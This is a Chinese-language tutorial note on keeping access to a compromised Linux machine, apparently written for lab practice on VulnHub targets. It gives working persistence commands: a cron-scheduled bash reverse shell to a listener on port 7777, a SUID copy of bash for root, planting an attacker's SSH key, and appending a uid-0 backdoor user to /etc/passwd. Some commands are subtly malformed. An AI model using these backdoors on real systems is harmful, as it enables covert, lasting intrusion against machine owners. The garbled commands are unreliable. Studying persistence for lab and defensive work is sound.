# 权限维持

目标机器可能会通过一些方法, 干掉攻击者留下的东西.

>  防止杀毒、杀进程、关端口打补丁等操作



## 权限维持方式

### 1. 各种编程语言的后门

### 2. 定时任务后门

```
crontab -u root -r         删除
```

```
crontab -u root -l        查看
```

```
crontab -u root -e         修改
```



### 3. 定时任务案例

kali 下监听7777 端口

```
nc -lvvp 7777
```

```
CentOs 写入任务:
*****bash -i >& /dev/tcp/目标靶机/7777 0>&1

# **** 表示最长不超过1分钟 就执行一次定时任务.
```



### 4. suid 后门

在拿到权限以后, 以通过自己创建一些 有 `S`权限的文件, 来保证之后的操纵与控制.

**sudi 案例:**

> 下面通过复制`.hack `文件, 并且赋权 , 来达到之后攻击者**在普通用户**, **执行root用户**

```
cp /bin/bash/var/.hack
```

在普通用户的情况下执行下面的命令, 就可以正常执行啦!!!:

```
/var/.hack -p
```



### 5. SSH Key 免密登录

> 当攻击者第一次成功执行root的某些命令的时候, 攻击者可以现在自己的kali 机中, 生产一个公钥, 然后, 攻击者通过将公钥放到受害者的 .ssh 文件夹中,那么攻击者在之后就不需要密码就可以直接连接上目标机器啦!!!

具体案例:

1. 攻击者在己的kali 机中生成公钥

```
ssh-keygen -t rsa
```



![image-20230325205629072](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/202303252056156.png)

然后**一直按回车就可以生成**

![image-20230325205815039](https://raw.githubusercontent.com/QDGSCLOUD/BJYH_picture/main/img/202303252058099.png)

2. 攻击者在提权后,  将`生成的公钥的内容` 写到一个新建的文件中, **将改文件放到目标机器的 .ssh文件夹中**
3. 之后攻击者可以直接通过命令在本机上连接靶机

```
ssh root@目标机的ip
```



### 6. 添加用户后门

1. 如果已经通过提权, 拿到root 用户了, 那么可以直接通过`useradd`来添加

2. 如果不是root 用户, **那么如果能找到一个具有文本编辑多功能的命令,  可以通过编辑`/etc/passwd`** 来加用户

   **具体步骤:**

   1. 使用kali 自带的工具, openssl 来生成一段 符合`passwd文件格式的 用户 和密码`

      ```
      # 生成一个用户名为 admin , 密码是 123456的用户
      # -1 表示 md5crypt 加密算法
      # -salt 指定 盐 为 admin
      # 123456 表示明文密码
      openssl passwd -1 -salt admin 123456
      ```

      

   2. 在靶机的`passwd`文件中, 写入:

   ```
   echo 'admin:$1Sadmin$LCIYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash'>>/etc/passwd
   ```

**uid 为 0 , 就是 root 用户 , 如果电脑中有除了 root 意外 uid为0的, 那么电脑肯定被攻击了**

  3. 在攻击机中输入:

     ```
     ssh admin@目标的ip
     ```

     

### 7. PAM提权

> 思路: 通过修改 或者 **替换** `系统文件` 来达到允许攻击者访问的目的

具体复现待~~~~> 可以网上搜索, 此处之后补充



# 更多权限维持

https://mp.weixin.qq.com/s/B5cam9QN8eDHFuaFjBD34Q

https://www.freebuf.com/articles/system/261271.html

# 推荐练习

https://www.vulnhub.com/entry/lampiao-1,249/

 https://www.vulnhub.com/entry/raven-2,269/(



